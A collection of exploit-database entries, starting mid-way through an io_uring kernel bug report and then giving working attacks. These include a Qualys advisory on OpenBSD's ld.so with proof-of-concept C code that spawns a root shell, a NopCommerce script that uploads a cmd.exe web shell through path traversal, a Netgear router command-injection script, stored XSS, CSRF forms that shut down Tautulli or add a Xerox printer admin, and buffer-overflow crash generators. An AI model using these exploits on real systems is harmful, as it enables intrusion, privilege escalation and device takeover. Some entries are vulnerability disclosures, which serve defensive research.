UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever $ ./uring_sendmsg got userfaultfd message submitted 1, getevents done cq_tail = 1 result: 32 $ ip addr show dev lo 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet 1.2.3.4/32 scope global lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever $ ========================================================================== The way I see it, the easiest way to fix this would probably be to grab a reference to the caller's credentials with get_current_cred() in io_uring_create(), then let the entry code of all the kernel worker threads permanently install these as their subjective credentials with override_creds(). (Or maybe commit_creds() - that would mean that you could actually see the owning user of these threads in the output of something like "ps aux". On the other hand, I'm not sure how that impacts stuff like signal sending, so override_creds() might be safer.) It would mean that you can't safely use an io_uring instance across something like a setuid() transition that drops privileges, but that's probably not a big problem? While the security bug was only introduced by the addition of IORING_OP_SENDMSG, it would probably be beneficial to mark such a change for backporting all the way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is called from rw_verify_area() has so far always attributed all the I/O operations to the kernel context, which isn't really a security problem, but might e.g. cause unexpected denials depending on the SELinux policy.

# Exploit Title: D-Link DIR-615 - Privilege Escalation # Date: 2019-12-10 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019-19743 # Reproduction Steps: # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1] # Go to the Maintenance page and click on Admin on the left panel. # There is an option to create a user and by default, it shows only user accounts. # Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) # by changing privileges id (1 to 2) with burp suite. # Privilege Escalation Post Request POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send # Now log in with newly created root (ptguy) user. You have all administrator rights.

Qualys Security Advisory Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726) ============================================================================== Contents ============================================================================== Summary Analysis Demonstration Acknowledgments ============================================================================== Summary ============================================================================== We discovered a Local Privilege Escalation in OpenBSD's dynamic loader (ld.so): this vulnerability is exploitable in the default installation (via the set-user-ID executable chpass or passwd) and yields full root privileges. We developed a simple proof of concept and successfully tested it against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both amd64 and i386; other releases and architectures are probably also exploitable. ============================================================================== Analysis ============================================================================== In this section, we analyze a step-by-step execution of our proof of concept: ------------------------------------------------------------------------------ 1/ We execve() the set-user-ID /usr/bin/chpass, but first: 1a/ we set the LD_LIBRARY_PATH environment variable to one single dot (the current working directory) and approximately ARG_MAX colons (the maximum number of bytes for the argument and environment list); as described in man ld.so: LD_LIBRARY_PATH A colon separated list of directories, prepending the default search path for shared libraries. This variable is ignored for set-user-ID and set-group-ID executables. 1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *) (2MB on amd64, 1MB on i386); as described in man setrlimit: RLIMIT_DATA The maximum size (in bytes) of the data segment for a process; this includes memory allocated via malloc(3) and all other anonymous memory mapped via mmap(2). ------------------------------------------------------------------------------ 2/ Before the main() function of chpass is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 262 void 263 _dl_setup_env(const char *argv0, char **envp) 264 { ... 271 _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp)); ... 283 _dl_trust = !_dl_issetugid(); 284 if (!_dl_trust) { /* Zap paths if s[ug]id... */ 285 if (_dl_libpath) { 286 _dl_free_path(_dl_libpath); 287 _dl_libpath = NULL; 288 _dl_unsetenv("LD_LIBRARY_PATH", envp); 289 } ------------------------------------------------------------------------------ 3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable and passes it to _dl_split_path(): 23 char ** 24 _dl_split_path(const char *searchpath) 25 { .. 35 pp = searchpath; 36 while (*pp) { 37 if (*pp == ':' || *pp == ';') 38 count++; 39 pp++; 40 } .. 45 retval = _dl_reallocarray(NULL, count, sizeof(*retval)); 46 if (retval == NULL) 47 return (NULL); ------------------------------------------------------------------------------ 4/ At line 45, count is approximately ARG_MAX (the number of colons in our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL. ------------------------------------------------------------------------------ 5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH is ignored, but it is not deleted from the environment (CVE-2019-19726): although _dl_trust is false (_dl_issetugid() returns true because chpass is set-user-ID), _dl_unsetenv() is not called (line 288) because _dl_libpath is NULL (line 285). ------------------------------------------------------------------------------ 6/ Next, the main() function of chpass is executed, and it: 6a/ calls setuid(0), which sets the real and effective user IDs to 0; 6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY; 6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb (unlike execve(), execv() does not reset the environment). ------------------------------------------------------------------------------ 7/ Before the main() function of pwd_mkdb is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 7a/ at line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable (because it was not deleted from the environment in step 5, and because execv() did not reset the environment in step 6c); 7b/ at line 45, _dl_reallocarray() does not return NULL anymore (because our low RLIMIT_DATA was reset in step 6b); 7c/ as a result, _dl_libpath is not NULL (line 271), and it is not reset to NULL (line 287) because _dl_trust is true (_dl_issetugid() returns false because pwd_mkdb is not set-user-ID, and because the real and effective user IDs were both set to 0 in step 6a): our LD_LIBRARY_PATH is not ignored anymore. ------------------------------------------------------------------------------ 8/ Finally, ld.so searches for shared libraries in _dl_libpath (our LD_LIBRARY_PATH) and loads our own library from the current working directory (the dot in our LD_LIBRARY_PATH). ------------------------------------------------------------------------------ ============================================================================== Demonstration ============================================================================== In this section, we demonstrate the use of our proof of concept: ------------------------------------------------------------------------------ $ id uid=32767(nobody) gid=32767(nobody) groups=32767(nobody) $ cd /tmp $ cat > lib.c << "EOF" #include <paths.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { if (setuid(0) != 0) _exit(__LINE__); if (setgid(0) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF $ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED 0x0000000000000001 (NEEDED) Shared library: [libutil.so.13.1] 0x0000000000000001 (NEEDED) Shared library: [libc.so.95.1] $ gcc -fpic -shared -s -o libutil.so.13.1 lib.c $ cat > poc.c << "EOF" #include <string.h> #include <sys/param.h> #include <sys/resource.h> #include <unistd.h> int main(int argc, char * const * argv) { #define LLP "LD_LIBRARY_PATH=." static char llp[ARG_MAX - 128]; memset(llp, ':', sizeof(llp)-1); memcpy(llp, LLP, sizeof(LLP)-1); char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL }; #define DATA (ARG_MAX * sizeof(char *)) const struct rlimit data = { DATA, DATA }; if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__); if (argc <= 1) _exit(__LINE__); argv += 1; execve(argv[0], argv, envp); _exit(__LINE__); } EOF $ gcc -s -o poc poc.c $ ./poc /usr/bin/chpass # id uid=0(root) gid=0(wheel) groups=32767(nobody) ------------------------------------------------------------------------------ ============================================================================== Acknowledgments ============================================================================== We thank Theo de Raadt and the OpenBSD developers for their incredibly quick response: they published a patch for this vulnerability in less than 3 hours. We also thank MITRE's CVE Assignment Team. [https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner> This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.

# Exploit Title: Netgear R6400 - Remote Code Execution # Date: 2019-12-14 # Exploit Author: Kevin Randall # CVE: CVE-2016-6277 # Vendor Homepage: https://www.netgear.com/ # Category: Hardware # Version: V1.0.7.2_1.1.93 # PoC #!/usr/bin/python import urllib2 IP_ADDR = "192.168.1.1" PROTOCOL = "http://" DIRECTORY = "/cgi-bin/;" CMD = "date" FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD req = urllib2.Request(url = FULL_URL) response = urllib2.urlopen(req) commandoutput = response.read() spl_word = "}" formattedoutput = commandoutput result = formattedoutput.rpartition(spl_word)[2] print result

# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting # Date: 2019-12-17 # Exploit Author: MTK # Vendor Homepage: https://sweethawk.co/zendesk/survey-app # Software Link: https://www.zendesk.com/apps/support/survey/ # Version: Up to v1.6 # Tested on: Zendesk - Firefox/Windows # Software description: # Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question. # You can get more granular satisfaction data without compromising the response rate. # Ask an optional NPS question on the landing page. View reports and drill down into the response # detail and go directly to the ticket. Easy to set up, just replace the survey place holder in # your trigger or automation. Customize the landing pages for each of your brands. # Technical Details & Impact: # Attackers use vulnerable web pages to inject malicious code and have it stored on the web server # for later use. The payload is automatically served to users who browse web pages and executed in # their context. Thus, the victims do not need to click on a malicious link to run the payload. # All they have to do is visit a vulnerable web page. # POC 1. Open Support ticket in Zendesk and send XSS payload e.g; <script>alert(1);</script> 2. Generate survey request to rate the ticket and payload will execute; # Time line 09-19-2019 - Vulnerability discovered 09-20-2019 - Vendor contacted 12-02-2019 - Detailed report shared and full disclosure time line given with no response 12-17-2019 - Full Disclosure

# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation # Author: Alessandro Magnosi (d3adc0de) # Date: 2019-07-07 # Vendor Homepage: https://www.nopcommerce.com/ # Software Link : https://www.nopcommerce.com/ # Tested Version: 4.2.0 # Vulnerability Type: Privilege Escalation # Tested on OS: Windows 10, CentOS, Docker # Exploit designed for: NopCommerce 4.2.0 on IIS import requests import argparse from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning import warnings warnings.filterwarnings("ignore", category=UserWarning, module='bs4') def proxy(flag): return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None def geturl(baseurl, type): if type == "login": return baseurl + "/login" elif type == "mv": return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2" elif type == "mkdir": return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common" elif type == "put": return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD" elif type == "contactus": return baseurl + "/contactus" else: return "" def login(email, password, url, proxy): res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False) cookie = res.cookies.get_dict() soup = BeautifulSoup(res.text, features="html.parser") token = soup.find("input", {"name":"__RequestVerificationToken"})["value"] res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False) cookies = res.cookies.get_dict() return { **cookies, **cookie } def shellupload(email, password, url, proxy): print("[+] Trying uploading shell from") cookies = login(email, password, url, proxy) # Rename Common Directory requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) # Create Common Directory requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) # Upload File into Common requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) # Test if it is working res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) soup = BeautifulSoup(res.text, features="html.parser") test = soup.find("span", {"id" : "cmdResult"}) if test is None: print("[-] Maybe the target is not vulnerable, or you need to restart the appliance") else: print("[+] Shell uploaded under contact us page") def main(): parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce') parser.add_argument( '-e', '--email', required=True, type=str, help='Username') parser.add_argument( '-p', '--password', required=True, type=str, help='Password') parser.add_argument( '-u', '--url', required=True, type=str, help='Base Url of NopCommerce') parser.add_argument( '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)') args = parser.parse_args() shellupload(args.email, args.password, args.url, proxy(args.proxy)) if __name__ == '__main__': requests.packages.urllib3.disable_warnings(InsecureRequestWarning) main()

# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown) # Date: 2018-12-17 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://tautulli.com/ # Software : https://github.com/Tautulli/Tautulli # Product Version: v2.1.9 # Platform: Windows 10 (10.0.18362) # Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)] # Vulernability Type : Cross-Site Request Forgery (ShutDown) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has # been discovered that anonymous access can be achieved in applications that do # not have a user login area and that the remote media server can be shut down. # PoC Python Script : #!/usr/bin/env python # -*- coding: utf-8 -*- import requests icon = """ _____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___ |_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \ | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ / |_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/ Unauthenticated Remote Code Execution by Ismail Tasdelen """ print(icon) host = input("[+] HOST: ") port = input("[+] PORT: ") response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands. if response.status_code == 200: print('[✓] Success!') elif response.status_code != 200: print('[✗] Unsuccessful!') else: exit() # HTTP GET Request : GET /shutdown HTTP/1.1 Host: XXX.XXX.XXX.XXX:8181 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://XXX.XXX.XXX.XXX:8181/home Upgrade-Insecure-Requests: 1 # CSRF PoC HTML : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://XXX.XXX.XXX.XXX:8181/shutdown"> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-17 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series # Software : Xerox Printer # Product Version: AltaLink C8035 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) # HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 707 Origin: https://XXX.XXX.XXX.XXX Connection: close Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10 Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp Upgrade-Insecure-Requests: 1 NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10 # CSRF PoC HTML : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST"> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" /> <input type="hidden" name="limited" value="0" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="minLength" value="1" /> <input type="hidden" name="maxLength" value="63" /> <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" /> <input type="hidden" name="isUserNameDisallowed" value="TRUE" /> <input type="hidden" name="isNumberRequired" value="" /> <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" /> <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" /> <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="frmUserName" value="ismailtasdelen" /> <input type="hidden" name="frmNewPassword" value="Test1234&#33;" /> <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" /> <input type="hidden" name="frmOldPassword" value="undefined" /> <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC) # Exploit Author : ZwX # Exploit Date: 2019-12-17 # Vendor Homepage : http://www.xnview.com # Link Software : https://www.xnview.com/fr/xnview/#downloads # Tested on OS: Windows 7 ''' Proof of Concept (PoC): ======================= 1.Download and install XnView 2.Open the XnView for Windows tools 3.Run the python operating script that will create a file (poc.txt) 4.Run the software " Tools -> Research -> A search window opens " 5.Copy and paste the characters in the file (poc.txt) 6.Paste the characters in the field 'File Name' and 'In' click on 'Research' 7.XnView for Windows Crashed ''' #!/usr/bin/python DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") poc = DoS file = open("poc.txt,"w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow # Exploit Author : ZwX # Exploit Date: 2019-12-17 # Vendor Homepage : http://www.avs4you.com/ # Link Software : http://www.avs4you.com/avs-audio-converter.aspx # Tested on OS: Windows 7 ''' Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in tihe official AVS Audio Converter. The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is marked as classic buffer overflow issue. Analyze Registers: ================== (1e74.1b78): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000 eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 42424242 ?? ??? 0:000> !exchain 0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d) 0012fa30: 42424242 Invalid exception stack at 41414141 Note: EIP & ECX overwritten Proof of Concept (PoC): ======================= 1.Download and install AVS Audio Converter 2.Open the AVS Audio Converter 3.Run the python operating script that will create a file (poc.txt) 4.copy and paste the characters found in the file (poc.txt) in the field "Exit folder" 5.Click on browse 6.EIP overwritten ''' #!/usr/bin/python buffer = "\x41" * 264 a = "\x42" * 4 b = "\x43" * 1000 poc = buffer + a + b file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

